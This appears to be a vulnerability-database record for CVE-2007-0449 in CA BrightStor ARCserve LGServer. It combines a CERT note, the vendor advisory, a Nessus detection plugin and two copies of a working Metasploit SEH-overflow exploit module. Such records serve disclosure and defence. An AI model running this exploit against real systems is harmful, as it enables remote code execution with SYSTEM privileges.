Business Protection Suite for Microsoft Small Business Server Standard Edition r2` \n`CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2``CA Desktop Management Suite:`\n\n`DMS r11.0` \n`DMS r11.1` \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with local SYSTEM privileges or cause a denial-of-service condition on a vulnerable system. 
\n \n--- \n \n### Solution \n\n**Apply an update**Apply an update, as specified in Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). The following fixes are provided \n \n`BABLD r11.1 SP2 \u2013 SP2 does not contain the vulnerability, there is no fix to apply \nBABLD r11.1 SP1 - QO83833 \nBABLD r11.0 - QI85497 \nDMS r11.1 - QO85401 \nDMS r11.0 - QI85423 \nBMB r4.0 - QO85402` \n \n--- \n \n**Restrict access**\n\n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service (typically `2200/tcp` and `1900/tcp`). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n357308\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: January 31, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [BrightStor Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23357308 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>\n * <http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34993>\n * <http://secunia.com/advisories/23897>\n * <http://xforce.iss.net/xforce/xfdb/31704>\n * <http://osvdb.org/displayvuln.php?osvdb_id=31593>\n * <http://www.securityfocus.com/bid/22199>\n\n### Acknowledgements\n\nThis vulnerability was disclosed by Computer Associates, who in turn credit NGSS.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0449](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0449>) \n---|--- \n**Severity Metric:** | 23.33 \n**Date Public:** | 2007-01-23 \n**Date First Published:** | 2007-01-31 \n**Date Last Updated: ** | 2007-02-02 20:17 UTC \n**Document Revision: ** | 13 \n", "modified": "2007-02-02T20:17:00", "published": "2007-01-31T00:00:00", "id": "VU:357308", "href": "https://www.kb.cert.org/vuls/id/357308", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup LGSERVER.EXE heap buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": 
[{"lastseen": "2016-02-01T23:47:04", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-0449. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16400", "href": "https://www.exploit-db.com/exploits/16400/", "sourceData": "##\r\n# $Id: lgserver.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\tfor Laptops & Desktops 11.1. 
By sending a specially crafted request, an attacker could\r\n\t\t\t\toverflow the buffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0449' ],\r\n\t\t\t\t\t[ 'OSVDB', '31593' ],\r\n\t\t\t\t\t[ 'BID', '22342' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro English All',\t\t{ 'Ret' => 0x75022ac4 } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 31 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(1900)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tfiller = \"0000016705\" + rand_text_english(2322)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tsploit = filler + seh + \"\\x58\" * 0x4141\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16400/"}], "metasploit": [{"lastseen": "2020-07-24T21:13:43", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. 
By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.\n", "published": "2007-02-04T01:58:50", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. 
By sending a specially crafted request, an attacker could\n overflow the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-0449' ],\n [ 'OSVDB', '31593' ],\n [ 'BID', '22342' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English All',\t\t{ 'Ret' => 0x75022ac4 } ],\n ],\n 'DisclosureDate' => 'Jan 31 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(1900)\n ])\n end\n\n def exploit\n connect\n\n filler = \"0000016705\" + rand_text_english(2322)\n seh = generate_seh_payload(target.ret)\n sploit = filler + seh + \"\\x58\" * 0x4141\n\n print_status(\"Trying target #{target.name}...\")\n\n sock.put(sploit)\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/lgserver.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2007-0449"], "description": " \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nTitle: [CAID 34993]: CA BrightStor ARCserve Backup for Laptops and \r\nDesktops Multiple Overflow Vulnerabilities\r\n\r\nCA Vuln ID (CAID): 34993\r\n\r\nCA Advisory Date: 2007-01-23\r\n\r\nDiscovered By: Next Generation Security Software\r\n\r\nImpact: Remote attacker can cause a denial of service or execute \r\narbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup for Laptops and Desktops \r\ncontains multiple overflow conditions that can allow a remote \r\nattacker to cause a denial of service, or execute arbitrary code \r\nwith local SYSTEM privileges on Windows.\r\n\r\nMitigating Factors: None.\r\n\r\nSeverity: 
CA has given these vulnerability issues a High risk \r\nrating.\r\n\r\nAffected Products:\r\nBrightStor Products:\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.1 SP1\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.1\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.0\r\n BrightStor Mobile Backup r4.0\r\nCA Protection Suites r2:\r\n CA Desktop Protection Suite r2\r\n CA Business Protection Suite r2\r\n CA Business Protection Suite for Microsoft Small Business \r\n Server Standard Edition r2\r\n CA Business Protection Suite for Microsoft Small Business \r\n Server Premium Edition r2\r\nCA Desktop Management Suite:\r\n DMS r11.0\r\n DMS r11.1\r\n\r\nAffected platforms:\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation: \r\nCustomers with vulnerable versions of the BrightStor ARCserve \r\nBackup Laptops & Desktops product should upgrade to the latest \r\nversions, which are available for download from \r\nhttp://supportconnect.ca.com. \r\nBABLD r11.1 SP2 \u2013 SP2 does not contain the vulnerability, so there \r\n is no fix to apply.\r\nBABLD r11.1 SP1 - QO83833\r\nBABLD r11.0 - QI85497\r\nDMS r11.1 - QO85401\r\nDMS r11.0 - QI85423\r\nBMB r4.0 - QO85402\r\n\r\nDetermining if you are affected:\r\nRefer to the appropriate APAR for details.\r\n\r\nReferences (URLs may wrap): \r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nImportant Security Notice for BrightStor ARCserve Backup for \r\nLaptops & Desktops\r\nhttp://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimps\r\nec-notice.asp\r\nSolution Document Reference APARs: \r\nQO83833, QI85497, QO85401, QI85423, QO85402\r\nCA Security Advisor posting:\r\nCA BrightStor ARCserve Backup for Laptops and Desktops Multiple \r\nOverflow Vulnerabilities\r\nhttp://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696\r\nCAID: 34993\r\nCAID Advisory 
link:\r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34993\r\nDiscoverer: Next Generation Security Software\r\nNext Generation Security Software advisories:\r\nhttp://www.ngssoftware.com/\r\nCVE Reference: CVE-2007-0449\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449\r\nOSVDB Reference: OSVDB ID: 31593\r\nhttp://osvdb.org/31593\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA \r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\nplease send email to vuln@ca.com.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\nyour findings to vuln@ca.com, or utilize our \"Submit a \r\nVulnerability\" form.\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www3.ca.com/contact/\r\nLegal Notice http://www3.ca.com/legal/\r\nPrivacy Policy http://www3.ca.com/privacy/\r\nCopyright (c) 2007 CA. 
All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBRbeBc3klkd/ilBmFEQJG0gCfU2yQqk/uLptvrB+sYb3eNQjPNdkAn08/\r\n8iR6Fz4tAXZYN+CXFy8awg8L\r\n=8k42\r\n-----END PGP SIGNATURE-----\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2007-01-24T00:00:00", "published": "2007-01-24T00:00:00", "id": "SECURITYVULNS:DOC:15821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15821", "title": "[Full-disclosure] [CAID 34993]: CA BrightStor ARCserve Backup for Laptops and Desktops Multiple Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-1448", "CVE-2007-1785", "CVE-2007-0449", "CVE-2007-0169", "CVE-2007-0672", "CVE-2007-14478", "CVE-2006-5172", "CVE-2006-5171", "CVE-2007-0673", "CVE-2006-6917", "CVE-2007-0816", "CVE-2007-0168", "CVE-2006-6076", "CVE-2007-1447"], "description": "Buffer overflows in backup discovery service and tape engine, backup message system.", "edition": 1, "modified": "2007-04-01T00:00:00", "published": "2007-04-01T00:00:00", "id": "SECURITYVULNS:VULN:6903", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6903", "title": "Brightstor ArcServe Backup buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T01:23:46", "description": "According to its version, the installation of BrightStor ARCserve\nBackup for Laptops & Desktops Server on the remote host is affected by\nmultiple buffer overflows and denial of service vulnerabilities that\ncan be exploited by a remote attacker to execute 
arbitrary code on the\naffected host with LOCAL SYSTEM privileges or to crash the associated\nservices.", "edition": 27, "published": "2007-01-26T00:00:00", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Server Multiple Vulnerabilities (QO83833)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0449", "CVE-2007-0672", "CVE-2007-0673"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops"], "id": "ARCSERVE_QO83833.NASL", "href": "https://www.tenable.com/plugins/nessus/24240", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24240);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2007-0449\", \"CVE-2007-0672\", \"CVE-2007-0673\");\n script_bugtraq_id(22199, 22337, 22339, 22340, 22342);\n\n script_name(english:\"CA BrightStor ARCserve Backup for Laptops & Desktops Server Multiple Vulnerabilities (QO83833)\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup for Laptops & Desktops Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server software is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup for Laptops & Desktops Server on the remote host is affected by\nmultiple buffer overflows and denial of service vulnerabilities that\ncan be exploited by a remote attacker to execute arbitrary code on the\naffected host with LOCAL SYSTEM privileges or to crash the associated\nservices.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/683\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://seclists.org/bugtraq/2007/Jan/685\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Jan/686\");\n # https://web.archive.org/web/20070206063608/http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a4ee8257\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as described in the vendor advisory\nreferenced above.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/01/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_lgserver_admin_detect.nasl\");\n script_require_keys(\"ARCSERVE/LGServer/Version\");\n\n exit(0);\n}\n\n\nver = get_kb_item(\"ARCSERVE/LGServer/Version\");\nif (isnull(ver)) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^([0-9]+\\.[0-9]+)\\.([0-9]+)$\");\nif 
(!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.1\" && build < 900) ||\n # nb: QI85497 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply BABLD r11.1 SP2.\n (ver == \"11.0\") ||\n # nb: QO85402 doesn't exist.\n (ver == \"4.0\")\n )\n {\n # Issue a report for each open port used by the server.\n port = get_kb_item(\"Services/lgserver\");\n if (port && get_tcp_port_state(port)) security_hole(port);\n\n port = get_kb_item(\"Services/lgserver_admin\");\n if (port && get_tcp_port_state(port)) security_hole(port);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}